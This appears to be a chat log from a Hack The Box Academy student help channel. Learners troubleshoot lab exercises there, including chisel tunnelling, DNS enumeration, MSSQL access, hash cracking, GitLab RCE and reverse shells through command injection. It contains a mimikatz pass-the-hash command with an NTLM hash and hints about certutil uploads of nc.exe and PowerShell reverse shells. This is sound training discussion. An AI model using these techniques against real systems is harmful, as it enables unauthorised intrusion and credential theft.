chisel_1.7.4_linux_amd64

when you use ./ it calls to the directory you're in, do you see a "chisel" file name?

what i'm saying is it downloaded that single file, instead of a package

chisel_1.7.4_linux_amd64 is the file name

is it a folder or file name

file

so instead of ./chisel, what do you think you should put?

./chisel_1.7.4_linux_amd64

You might need to chmod +x chisel_1.7.4_linux_amd64

omg

nah

command not found

./ligolo xD

sudo ./chisel_1.7.4_linux_amd64 server -v -p 1234 --socks5
[sudo] password for ubuntu:
sudo: ./chisel_1.7.4_linux_amd64: command not found

make sure it's not a folder and chmod +x like gubarz said

protip: tab autocompletes, so you can just start typing ./ch and hit tab

file chisel_1.7.4_linux_amd64

i got it listening! chmod+x was the trick, along with everything else, thanks @cloud urchin

and @shut quest

got the flag ❤️

I am a bit confused by the Shared Object Hijacking in linux priv esc. Like if I run the binary it automatically drops me to root....requiring me to do nothing. Also .so library is not even writeable, in the module the author shows how to exploit by overwriting it. What's going on ?

like whats the whole point of the question/exercise if it just works with no intervention ?

Your answer is in the section question.

...recreate all examples (don't just run the payroll binary). Practice using ldd and readelf.

And if that doesn't do it for you, practice. Time on the keyboard. It's to get you through the motions of how to perform that kind of exploit.

Bro, the module itself does not even correlate with the environment in the lab. Practice what ? In the module he overwrites the shared library, but in the environment we do not have write permission on it

look

practice what ? library is not even writeable like they show it. What example to recreate ?

I was having issues with crackmapexec so tried netexec and it was complaining about missing impacket modules. I had to manually install the relevant python files in /home/kali/.local/lib/python3.11/site-packages/impacket copied from https://github.com/fortra/impacket/tree/master/impacket

Most of the files were installed by pip but not all

BRUH, it's about learning how to detect so's, they created the exploit for you.

yeah, the directory is definitely writable

yeah, but now I have create my own payroll binary and set RUNPATH during gcc compilation, then try to exploit it ?

honestly there is barely one paragraph of explanations for this section, hacktricks shows it more detail and actually explains it, very dissapointed with linux lpe module overall

i really liked the hijacking parts

the concept is interesting, the way the author explains in this section is bad, whole section has less than 50 words I think

actually you cannot even recreate the example in the module

why this is not working i am using pwnbox

you have to compile the payload.c into a new binary and link it with dsquery, but then you cannot set SUID on the compiled binary and change owership to root

sqsh isn't installed

If you just here to bitch about it, no one cares. If you want to foster growth for the module/community leave some /feedback and provide some positive criticism about the section.

lol i didnot like this specific module Attacking Commom Services there is no point for putting this module as we already studie the port enum at starting module and the labs are absolutely not good that FTP challenge out of 10 , 8 times it didnot shows that port and in this sql attack module the sqsh command are not working properly

sqsh is for MSSQL, right?

it doesn't work for me. i used mssqlclient.py instead

yes

feedback like the one people give for Thick Client apps ? Section is the same, despite multiple people complaining about it

but there is some diff of commmands for both tools

yea they are different tools, so you'll have to learn the syntax. mssqlclient.py is an impacket script, so it shouldn't be too hard to figure out

I used sqsh for the second question as mssqlclient wasn't working for me

the MSSQL commands will obviously be the same though

mssqlclient automate enabling xp_cmdshell

huh. two different sides

so it's easier to use

seems more convenient that easier

Xoriath asks the realest questions 😹

https://academy.hackthebox.com/module/134/section/1200

Web attacks

Chaining IDOR Vulnerabilities

Change the admins email to flag@idor.htb and you will get the flag

I changed the email but theres no flag anywhere..? any ideas?

Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to extract the admin.php page and find the hidden API but keep getting ||{"error":"Please specify a customer ID"}||, tried fuzzing bunch of params but none worked, any hints? Managed to solve, DM if help required

Wait until you reach linux lpe, I really thought the entire path was super high quality until this one. Check juggernaut security blog, if you do not get some of the sections, it really helped me

nvm i found it, terrible wording for this question

Sounds like you need to enumerate the API's database.

You can DM me

Will do

dumb question but

how do i execute my notification

That's been a while but iirc open it up and there's a test notification button

Yeah that's in the lesson but not in the task

which one?

Attack common application prtg network monitor

guys i got the credentials for alex in Footprinting Lab - Medium.. tried everything through rdp to find the other user for mysql login... but am stuck here

anyone have done this lab before ?

Nvm figured it out

trying to find out the right parameter to enumerate the API, have tried fuzzing it

I'm still struggling on this one.

I've tried:
||1. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt internal.inlanefreight.htb
2. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt app.inlanefreight.htb
3. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt ns.inlanefreight.htb
4. dnsenum --dnsserver 10.129.203.140 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb

Also tried:
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.internal.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.app.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
┌─[eu-academy-1]─[]─[htb-ac-537556@htb-bwgchqgqcu]─[~]
└──╼ [★]$ for sub in $(cat /opt/useful/seclists/Discovery/DNS/fierce-hostlist.txt );do dig $sub.ns.inlanefreight.htb @10.129.203.140 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
||

Can anyone point me in the right direction? 🤕

there are more than the 3 subdomains you have showcased in your example

Nvm I got it

why？

might be a longshot but is there a space between MS and I? my eyes could also be misconfigured

There are no spaces.

It's driving me crazy.

Try to use -force

find Write-UserAddMSI in the PS module to see if it's actually there. could have been renamed

I imported the wrong script, my mistake.

Can someone do sanity check for my AEAD Skills Assesment 1? Having problems with msfconsole/socket

It's the mssql one ?

Find an interesting file

After you rdp

Hey anyone got errors installing droopescan to solve joomla disvovery enumeration section

Try the docker version
https://github.com/SamJoan/droopescan

Is there anyone I can PM for help with regards to Windows Privilege Escalation Skill Assessment I ?

Just send it here

I am not able to get a foothold, can you give me a nudge?

Im unsure of how to use command injection to get back a reverse shell

I tried to upload to the victim via certutil -urlcache -f but it always returns an error

what is the difference between Pass the Hash and Pass the Keys?
i've got ntlm hash of a domian joined user and got access to his share on the domain, so i can also use Pass the keys, which is actually the hash i will send to the KDC, then what is the difference?

in the module, after gettingg the keys, we perform pass teh key as:

mimikatz # sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

see here we also used ntlm, so how is it different

usure what you mean by pass the key

like pass the ticket?

i guess the difference lays in authentication and authorization

The Overpass The Hash/Pass The Key (PTK) attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.

A Pass-the-Hash (PtH) attack is a technique where an attacker captures a password hash (as opposed to the password characters) and then passes it through for authentication and lateral access to other networked systems. With this technique, the threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated.

honestly it looks a lot like ptt

but if anyone can explain it better let me know

i think it is like authentication that, the domain joined user knows his authentication and encrypts the timestamp with his password hash and then the key is what we send to kdc to autheticate ourself, it is sooo similar to pas the hash

In an overpass-the-hash attack, an adversary leverages the NTLM hash of a user account to obtain a Kerberos ticket that can be used to access network resources.

its a different thing, pth doesnt touch kerberos so its simply a way to authenticate, where overpass-the-hash or ptk you can create or forge tickets based on the ntlm hash and abuse the authorization

if that makes sense

hmm makes a lot sense

https://www.youtube.com/watch?v=qJ33b10R9jE

https://www.youtube.com/watch?v=7bxyWOQuj9c

i might be really wrong and dont quote me, but thats what i got from the blogs i've read so far

yeah this is correct

deleted above messages because i caught myself trying explain things in different ways leading to the same result 😒

Can anyone give a nudge with regards to gaining a reverse shell through the command injection flaw in Windows Privilege Skills Assessment I ?

what have you tried?

like your not giving a lot of info about it

so I know that it is vulnerable to the ||&&|| and tried to use certutil to upload ||nc.exe|| but it does not work

I have also tried various shells from revshells but it does not execute

if you have rce why not use a powershell reverse shell?

oh thank you

i didnt think about that

cant sign into greenbone | module: vulnerability assessment | section: OpenVAS assessment skills

oh oops i see why LOL

Hi, I have a question about the "Getting Started" module of the "Penetration Tester" path. The problem is that the web page doesn't load. I think it has to do with the configuration of /etc/hosts but I don't quite understand what's going on. Does anyone have any idea?

sure, can you send the /etc/hosts file?

or what you have in there

it might be an issue with the spacing of the ip and domain name

I cannot send screenshot

127.0.0.1 localhost
127.0.1.1 debian12-parrot

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-yfgfxasr0l htb-yfgfxasr0l.htb-cloud.com

under 127.0.1.1 u wanna put in the IP address and then the domain after.

IP = your target

so 127.0.1.1 is the IP, debain12-parrot is the host. example:

10.129.92.5 http://www.hackthebox.com/

now if you navigate to "http://hackthebox.com/" it'll be responsive on google

this is just an example URL varies on what your machine tells you to go to

and how can i know de domain? they only give me this 94.237.60.34:39332

is this the right channel to ask for help on questions?

Does it have anything to do with this data? -> Connected to htb-yfgfxasr0l:1 (htb-ac-1463051)

u dont need to use the host file then. Just go to the "http://94.237.60.34:39332"

Module: Information Gathering- web edition
Section: Subdomain enumeration

Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"

I've tried:

1. ran command gobuster vhost -u http://83.136.255.40:35863 -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain inlanefreight.htb
2. edited etc/hosts file and put the <generated ip without port number> inlanefreight.htb
3. the command produces no result

on your google, make sure you're connected to the openvpn config too

sudo gobuster dns -w wordListPath -d inlanefreight.htb

try this

see if a domain comes up

Is this channel not for asking questions about modules? I'm new to Discord

u use this channel to get support with the modules u need

sorry it just said discussing modules i wasnt sure if there was a dedicated questions one

time to time someone will be here to assist

Im doing that, but it does not load

check if ur connected to the openvpn config

file extension is ".ovpn"

make sure thats running

send an ss of your host file, what's inside it?

did you access the provided IP on firefox?

use "http://94.237.60.34:39332" make sure nothing in your host file is interfering with the ip you've gave in

yes, at the VM

to send screenshot, read and follow #welcome

Same zero results.

i fw that name i love that

payloadbunny is a fire user

and does it load up any web page?

nono

which section is it exactly?

#resources-tools

One of the first, "Basic Tools"

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

can i know what are the first modules to begin with?

Any advice?

You don't really have to make any edits in the /etc/hosts/, you are just supposed to grab the banner

did the section teach you anything about it? ||Hint: it did||

,

InfoSec Foundation is a skill path which I would highly suggest

https://academy.hackthebox.com/paths

alright thanks

nothing came

Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

Any advice I did not understand the question

Ah, thanks, I've solved it now. I understood that I had to find a banner on a website. My English is not very good. Sorry for the inconvenience.

Its alright, dw about it

Stuck in attacking common applications section attacking gitlab q2 gain rce

tried fond the user name tried password spraying password bruteforce created the new user .
Unable the guess the password for the user and with the created account can't get the rce

anyone know how to fix this "Job for ssh.service failed because the control process exited with error code.
See "systemctl status ssh.service" and "journalctl -xeu ssh.service" for details."

Module: Footprinting
Section: IPMI

Question: What is the account's cleartext password?

So I have used metasploit setting the OUTPUT_HASHCAT_FILE and get a ipmi_hash.hash, which is nice. Then I do,

||hashcat -m 7300 -a 0 /tmp/ipmi_hash.hash /usr/share/wordlists/rockyou.txt --user ||

And: * Device #1: Not enough allocatable device memory for this attack.

😢

just run hashcat in your host

find the user with gitlab_usernum.py

Found the user name

ok now use the default password provide on the section

Once you've found the common password*, use these credentials for your rce with the Poc gitlab_13_10_2_rce.py

can anyone tell in HTB ctf i want to participate in upcoming ctf but it ask for input key what is that??

I have tried all the default passwords that are provided in this section. And if the name is case sensitive I have tried it with them as well

which password did you try?

Hey guys, currently on Module 7 - Password attacks, attacking NTDS.dit section. I'm a bit confused with this line:

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.

But when I search online whether its possible to make a copy of NTDS.dit with only local admin rights, it shows Access to ntds.dit is highly restricted because it contains sensitive data, including hashed passwords. Only domain administrators or those with equivalent privileges, such as system administrators on a domain controller, would be able to interact with the ntds.dit file.

password1 Password1 password 123 Password123 Welcome1 welcome1

ahahah the Password it's here It's up to you to find the right one and use the POC correctly.

What is your question; is it confusion between which is necessary to access NTDS.dit: Local Admin vs Domain Admin? As I understand it, there is no distinction between "local" and "domain" authentication after you upgrade a server to become a domain controller. Local authentication on a DC becomes functionally equivalent to authenticating through the domain, you're just doing it locally instead of accessing the DC over a network.

Help me stuck hear for 2 day